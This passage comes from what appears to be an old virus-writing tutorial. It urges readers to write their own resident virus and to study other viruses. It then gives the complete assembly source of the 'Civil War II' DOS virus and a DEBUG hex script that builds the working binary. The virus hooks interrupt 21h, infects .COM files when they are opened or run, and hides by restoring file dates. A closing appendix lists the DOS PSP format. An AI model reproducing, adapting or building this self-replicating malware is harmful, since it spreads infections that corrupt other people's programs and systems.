in writing your first resident virus is to start out on paper and visualize all of the steps that your virus must take in order to function in the pre and post residency stages. Study other virii. Take a look at the techniques other virus writers have used in their code. Figure out what works best and use it. Good luck! Horny Toad Appendix 1 - Civil War II Virus V1.1 by Dark Helmet ------------------------------------------------------------ .Radix 16 Civil_War Segment Model small Assume cs:Civil_War, ds:Civil_War, es:Civil_War org 100h len equ offset last - begin virus_len equ len / 16d dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection ; marker begin: Call virus ; make call to ; push IP on stack virus: pop bp ; get IP from stack. sub bp,109h ;adjust IP. restore_host: mov di,0100h ; recover beginning lea si,ds:[carrier_begin+bp] ; of carrier program. mov cx,06h rep movsb check_resident: mov ah,0a0h ; check if virus int 21h ; already installed. cmp ax,0001h je end_virus adjust_memory: mov ax,cs ;start of Memory dec ax ;Control Block mov ds,ax cmp byte ptr ds:[0000],5a ;check if last ;block jne abort ;if not last block ;end mov ax,ds:[0003] ;decrease memory sub ax,40 ;by 1kbyte lenght mov ds:[0003],ax sub word ptr ds:[0012],40h install_virus: mov bx,ax ; es point to start mov ax,es ;virus in memory add ax,bx mov es,ax mov cx,len ;cx =length virus mov ax,ds ;restore ds inc ax mov ds,ax lea si,ds:[begin+bp] ;point to start virus lea di,es:0100 ;point to destination rep movsb ;copy virus in ;memory mov [virus_segment+bp],es ;store start virus ;in memory mov ax,cs ;restore es mov es,ax hook_vector: cli ; no interups mov ax,3521h ; revector int 21 int 21h mov ds,[virus_segment+bp] mov old_21h-6h,bx mov old_21h+2-6h,es mov dx,offset main_virus - 6h mov ax,2521h int 21h sti abort: mov ax,cs mov ds,ax mov es,ax end_virus: mov bx,0100h ; jump to begin jmp bx ; host file ;*********************************************************** main_virus: pushf cmp ah,0a0h ;check virus call jne new_21h ;no virus call mov ax,0001h ;ax = id popf ;return id iret new_21h: push ds ; save registers push es push di push si push ax push bx push cx push dx check_open: cmp ah,3dh je chk_com check_exec: cmp ax,04b00h ; exec function? je chk_com continu: pop dx ; restore registers pop cx pop bx pop ax pop si pop di pop es pop ds popf jmp dword ptr cs:[old_21h-6] chk_com: mov cs:[name_seg-6],ds mov cs:[name_off-6],dx cld ;check extension mov di,dx ;for COM push ds pop es mov al,'.' ;search extension repne scasb ;check for 'COM" cmp word ptr es:[di],'OC' ;check 'CO' jne continu cmp word ptr es:[di+2],'M' ;check 'M' jne continu call set_int24h call set_atribuut open_file: mov ds,cs:[name_seg-6] mov dx,cs:[name_off-6] mov ax,3D02h ; open file call do_int21h jc close_file push cs pop ds mov [handle-6],ax mov bx,ax call get_date check_infect: push cs pop ds mov bx,[handle-6] ; read first 6 bytes mov ah,3fh mov cx,06h lea dx,[carrier_begin-6] call do_int21h mov al, byte ptr [carrier_begin-6]+3 ; check initials mov ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H' cmp ax,[initials-6] je save_date ; if equal already ; infect get_lenght: mov ax,4200h ; file pointer begin call move_pointer mov ax,4202h ; file pointer end call move_pointer sub ax,03h ; ax = filelenght mov [lenght_file-6],ax call write_jmp call write_virus save_date: push cs pop ds mov bx,[handle-6] mov dx,[date-6] mov cx,[time-6] mov ax,5701h call do_int21h close_file: mov bx,[handle-6] mov ah,03eh ; close file call do_int21h mov dx,cs:[old_24h-6] ; restore int24h mov ds,cs:[old_24h+2-6] mov ax,2524h call do_int21h jmp continu new_24h: mov al,3 iret ;----------------------------------------------------------- ; PROCEDURES ;----------------------------------------------------------- move_pointer: push cs pop ds mov bx,[handle-6] xor cx,cx xor dx,dx call do_int21h ret do_int21h: pushf call dword ptr cs:[old_21h-6] ret write_jmp: push cs pop ds mov ax,4200h call move_pointer mov ah,40h mov cx,01h lea dx,[jump-6] call do_int21h mov ah,40h mov cx,02h lea dx,[lenght_file-6] call do_int21h mov ah,40h mov cx,02h lea dx,[initials-6] call do_int21h ret write_virus: push cs pop ds mov ax,4202h call move_pointer mov ah,40 mov cx,len mov dx,100 call do_int21h ret get_date: mov ax,5700h call do_int21h push cs pop ds mov [date-6],dx mov [time-6],cx ret set_int24h: mov ax,3524h call do_int21h mov cs:[old_24h-6],bx mov cs:[old_24h+2-6],es mov dx,offset new_24h-6 push cs pop ds mov ax,2524h call do_int21h ret set_atribuut: mov ax,4300h ; get atribuut mov ds,cs:[name_seg-6] mov dx,cs:[name_off-6] call do_int21h and cl,0feh ; set atribuut mov ax,4301h call do_int21h ret ;----------------------------------------------------------- ; DATA ;----------------------------------------------------------- old_21h dw 00h,00h old_24h dw 00h,00h carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h text db 'Civil War II v1.1, (c) 06/03/1992 Trident/Dark Helmet',00h jump db 0e9h name_seg dw ? name_off dw ? virus_segment dw ? lenght_file dw ? handle dw ? date dw ? time dw ? initials dw 4844h last db 090h Civil_war ends end dummy Debug Script for Civil War II virus N CIVIL.COM E 0100 E9 03 00 44 48 00 E8 00 00 5D 81 ED 09 01 BF 00 E 0110 01 8D B6 FF 02 B9 06 00 F3 A4 B4 A0 CD 21 3D 01 E 0120 00 74 5E 8C C8 48 8E D8 80 3E 00 00 5A 75 4C A1 E 0130 03 00 2D 40 00 A3 03 00 83 2E 12 00 40 8B D8 8C E 0140 C0 03 C3 8E C0 B9 57 02 8C D8 40 8E D8 8D B6 06 E 0150 01 BF 00 01 F3 A4 3E 8C 86 51 03 8C C8 8E C0 FA E 0160 B8 21 35 CD 21 3E 8E 9E 51 03 89 1E F1 02 8C 06 E 0170 F3 02 BA 80 01 B8 21 25 CD 21 FB 8C C8 8E D8 8E E 0180 C0 BB 00 01 FF E3 9C 80 FC A0 75 05 B8 01 00 9D E 0190 CF 1E 06 57 56 50 53 51 52 80 FC 3D 74 13 3D 00 E 01A0 4B 74 0E 5A 59 5B 58 5E 5F 07 1F 9D 2E FF 2E F1 E 01B0 02 2E 8C 1E 47 03 2E 89 16 49 03 FC 8B FA 1E 07 E 01C0 B0 2E F2 AE 26 81 3D 43 4F 75 D8 26 83 7D 02 4D E 01D0 75 D1 E8 EC 00 E8 05 01 2E 8E 1E 47 03 2E 8B 16 E 01E0 49 03 B8 02 3D E8 83 00 72 54 0E 1F A3 4F 03 8B E 01F0 D8 E8 BC 00 0E 1F 8B 1E 4F 03 B4 3F B9 06 00 BA E 0200 F9 02 E8 66 00 A0 FC 02 8A 26 FD 02 3B 06 55 03 E 0210 74 18 B8 00 42 E8 45 00 B8 02 42 E8 3F 00 2D 03 E 0220 00 A3 4D 03 E8 4B 00 E8 72 00 0E 1F 8B 1E 4F 03 E 0230 8B 16 51 03 8B 0E 53 03 B8 01 57 E8 2D 00 8B 1E E 0240 4F 03 B4 3E E8 24 00 2E 8B 16 F5 02 2E 8E 1E F7 E 0250 02 B8 24 25 E8 14 00 E9 49 FF B0 03 CF 0E 1F 8B E 0260 1E 4F 03 33 C9 33 D2 E8 01 00 C3 9C 2E FF 1E F1 E 0270 02 C3 0E 1F B8 00 42 E8 E3 FF B4 40 B9 01 00 BA E 0280 46 03 E8 E6 FF B4 40 B9 02 00 BA 4D 03 E8 DB FF E 0290 B4 40 B9 02 00 BA 55 03 E8 D0 FF C3 0E 1F B8 02 E 02A0 42 E8 B9 FF B4 40 B9 57 02 BA 00 01 E8 BC FF C3 E 02B0 B8 00 57 E8 B5 FF 0E 1F 89 16 51 03 89 0E 53 03 E 02C0 C3 B8 24 35 E8 A4 FF 2E 89 1E F5 02 2E 8C 06 F7 E 02D0 02 BA 54 02 0E 1F B8 24 25 E8 8F FF C3 B8 00 43 E 02E0 2E 8E 1E 47 03 2E 8B 16 49 03 E8 7E FF 80 E1 FE E 02F0 B8 01 43 E8 75 FF C3 00 00 00 00 00 00 00 00 90 E 0300 CD 20 44 48 00 43 69 76 69 6C 20 57 61 72 20 49 E 0310 49 20 76 31 2E 31 2C 20 28 63 29 20 30 36 2F 30 E 0320 33 2F 31 39 39 32 20 54 72 69 64 65 6E 74 2F 44 E 0330 61 72 6B 20 48 65 6C 6D 65 74 2C 20 54 68 65 20 E 0340 4E 65 74 68 65 72 6C 61 6E 64 73 00 E9 00 00 00 E 0350 00 00 00 00 00 00 00 00 00 00 00 44 48 90 RCX 025E W Q Appendix 2 - The PSP (from Ralf Brown's Interrupt List) Format of Program Segment Prefix (PSP): Offset Size Description (Table 1032) 00h 2 BYTEs INT 20 instruction for CP/M CALL 0 program termination the CDh 20h here is often used as a signature for a valid PSP 02h WORD segment of first byte beyond memory allocated to program 04h BYTE (DOS) unused filler (OS/2) count of fake DOS version returns 05h BYTE CP/M CALL 5 service request (FAR CALL to absolute 000C0h) BUG: (DOS 2+ DEBUG) PSPs created by DEBUG point at 000BEh 06h WORD CP/M compatibility--size of first segment for .COM files 08h 2 BYTEs remainder of FAR JMP at 05h 0Ah DWORD stored INT 22 termination address 0Eh DWORD stored INT 23 control-Break handler address 12h DWORD DOS 1.1+ stored INT 24 critical error handler address 16h WORD segment of parent PSP 18h 20 BYTEs DOS 2+ Job File Table, one byte per file handle, FFh = closed 2Ch WORD DOS 2+ segment of environment for process (see #1033) 2Eh DWORD DOS 2+ process's SS:SP on entry to last INT 21 call 32h WORD DOS 3+ number of entries in JFT (default 20) 34h DWORD DOS 3+ pointer to JFT (default PSP:0018h) 38h DWORD DOS 3+ pointer to previous PSP (default FFFFFFFFh in 3.x) used by SHARE in DOS 3.3 3Ch BYTE DOS 4+ (DBCS) interim console flag (see AX=6301h) Novell DOS 7 DBCS interim flag as set with AX=6301h (possibly also used by Far East MS-DOS 3.2-3.3) 3Dh BYTE (APPEND) TrueName flag (see INT 2F/AX=B711h) 3Eh BYTE (Novell NetWare) flag: next byte initialized if CEh (OS/2) capabilities flag 3Fh BYTE (Novell NetWare) Novell task number if previous byte is CEh 40h 2 BYTEs DOS 5+ version to return on INT 21/AH=30h 42h WORD (MSWindows3) selector of next PSP (PDB) in linked list Windows keeps a linked list of Windows programs only 44h WORD (MSWindows3) "PDB_Partition" 46h WORD (MSWindows3) "PDB_NextPDB" 48h BYTE (MSWindows3) bit 0 set if non-Windows application (WINOLDAP) 49h BYTE unused by DOS versions <= 6.00 4Ch WORD (MSWindows3) "PDB_EntryStack" 4Eh 2 BYTEs unused by DOS versions <= 6.00 50h 3 BYTEs DOS 2+ service request (INT 21/RETF instructions) 53h 2 BYTEs unused in DOS versions <= 6.00 55h 7 BYTEs unused in DOS versions <= 6.00; can be used to make first FCB into an extended FCB 5Ch 16 BYTEs first default FCB, filled in from first commandline argument overwrites second FCB if opened 6Ch 16 BYTEs second default FCB, filled in from second commandline argument overwrites beginning of commandline if opened 7Ch 4 BYTEs unused 80h 128 BYTEs commandline / default DTA command tail is BYTE for length of tail, N BYTEs for the tail, followed by a BYTE containing 0Dh